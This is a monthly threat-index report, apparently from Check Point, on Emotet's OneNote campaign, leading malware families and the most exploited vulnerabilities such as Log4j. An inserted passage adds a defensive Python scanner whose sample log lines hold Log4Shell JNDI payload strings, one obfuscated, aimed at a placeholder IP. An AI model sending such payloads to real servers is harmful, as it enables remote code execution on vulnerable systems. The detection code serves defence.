Top malware in March

Last month, security researchers uncovered a new malware campaign from the notorious Emotet Trojan. As reported earlier this year, since Microsoft announced it would block macros in Office files, Emotet attackers have been looking for alternative ways to proliferate malicious files.

In the most recent campaign, the attackers have chosen a new strategy: they send spam emails that contain a malicious OneNote file. Once opened, a fake message appears, tricking the victim into clicking on the document, which downloads the Emotet infection. Once installed, the malware can harvest email account data such as login credentials and contact information. Attackers then use the information gathered to extend the reach of the campaign and facilitate future attacks.

Bypassed security measures

Maya Horowitz, VP Research at Check Point Software, on the latest Global Threat Index: "Although large technology companies do their best to take down cybercriminals as early as possible, it is almost impossible to prevent every attack that bypasses security measures. We know that Emotet is a sophisticated Trojan, and it's no surprise that it managed to bypass Microsoft's new defenses. The most important thing people can do is ensure proper email security, avoid downloading unexpected files, and be very skeptical about the origin of an email and its content."

Malware Top 3 in Germany:

The arrows refer to the change in ranking compared to the previous month.

  • Qbot – Qbot, also known as Qakbot, is a banking Trojan that first appeared in 2008. It is designed to steal a user's banking information and keystrokes. Commonly distributed via spam emails, Qbot uses multiple anti-VM, anti-debugging, and anti-sandbox techniques to complicate analysis and evade detection.
  • Guloader – Guloader is a downloader that has been widely used since December 2019. When it first appeared, Guloader was used to download Parallax RAT, but also other remote access Trojans and info-stealers, such as Netwire, Formbook, and Agent Tesla.
  • Emotet – Emotet is an advanced, self-propagating and modular trojan horse that was once used as a banking trojan and currently proliferates other malware or malicious campaigns. Emotet uses multiple persistence methods and evasion techniques to avoid detection and can be distributed via phishing spam emails with malicious attachments or links.

Top 3 vulnerabilities:

In March, Apache Log4j Remote Code Execution was the top exploited vulnerability, affecting 44 percent of organizations worldwide, closely followed by HTTP Headers Remote Code Execution with a 43 percent share. MVPower DVR Remote Code Execution ranks third with a global impact of 40 percent.

  • Apache Log4j Remote Code Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to run arbitrary code on the affected system.
  • HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - HTTP headers allow the client and server to pass additional information with an HTTP request. An attacker can use a vulnerable HTTP header to execute arbitrary code on the victim's machine.
  • MVPower DVR Remote Code Execution - Remote code execution vulnerability exists in MVPower DVR devices. An attacker can exploit this vulnerability to execute arbitrary code on the affected router via a manipulated request.
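One defender-side check for the Log4j entry above, added here as an example and not taken from the Check Point report: a small Python scanner that undoes common Log4j lookup obfuscation and URL-encoding, then flags web-server log lines that carry a JNDI lookup string in any header or URL. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report): a benign request,
# a plain JNDI lookup in the User-Agent header, and an obfuscated variant that
# hides "jndi" behind nested ${lower:...} lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Mar/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Mar/2023:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9/a}"',
    '10.0.0.8 - - [01/Mar/2023:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:rmi://203.0.113.9/b}"',
]

# Log4j lookups commonly used to disguise the "jndi" token: ${lower:x}, ${upper:x}
# and the default-value form ${::-x}. Each of them evaluates to its argument.
_WRAPPER = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}|\$\{::-([^{}]*)\}', re.IGNORECASE)
# What remains after unwrapping: the JNDI lookup prefix itself.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalize(text):
    """Undo URL-encoding and strip wrapper lookups until nothing changes."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text.lower()


def is_log4shell_probe(line):
    """True if the normalized line carries a ${jndi:...} lookup string."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, line) for every suspicious log entry."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOGS):
        print(f"line {number}: possible Log4Shell probe: {line}")
```

A hit only shows that a lookup string reached the server; whether the instance was vulnerable still depends on the Log4j version and configuration behind it.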

Top 3 Mobile Malware:

Over the past month, AhMyth was the most prevalent mobile malware, followed by Anubis and Hiddad.

  • AhMyth – AhMyth is a Remote Access Trojan (RAT) discovered in 2017. It is distributed via Android apps found in app stores and various websites. When a user installs one of these infected apps, the malware can collect sensitive information from the device and perform actions like keylogging, taking screenshots, sending SMS messages, and activating the camera.
  • Anubis – Anubis is a banking Trojan developed for Android phones. Since its initial detection, it has gained additional features including remote access trojan (RAT), keylogger and audio recording capabilities, and various ransomware functions. It has been spotted in hundreds of different applications on the Google Store.
  • Hiddad - Hiddad is an Android malware that repackages legitimate apps and then publishes them to a third-party store. Its main function is to display advertisements, but it can also gain access to important operating system security details.

Attacked industries:

  • Retail/Wholesale
  • Education/Research
  • Healthcare

Check Point's Global Threat Impact Index and ThreatCloud Map are powered by Check Point's ThreatCloud Intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This intelligence is enriched with AI-based engines and exclusive research data from Check Point Research, the research and development department of Check Point Software Technologies.

More at Checkpoint.com

About Check Point

Check Point Software Technologies GmbH (www.checkpoint.com/de) is a leading provider of cybersecurity solutions for public administrations and companies worldwide. The solutions protect customers from cyberattacks with an industry-leading detection rate for malware, ransomware and other types of attacks. Check Point offers a multi-level security architecture that protects company information in cloud environments, networks and on mobile devices, as well as the most comprehensive and intuitive "one point of control" security management system. Check Point protects over 100,000 businesses of all sizes.
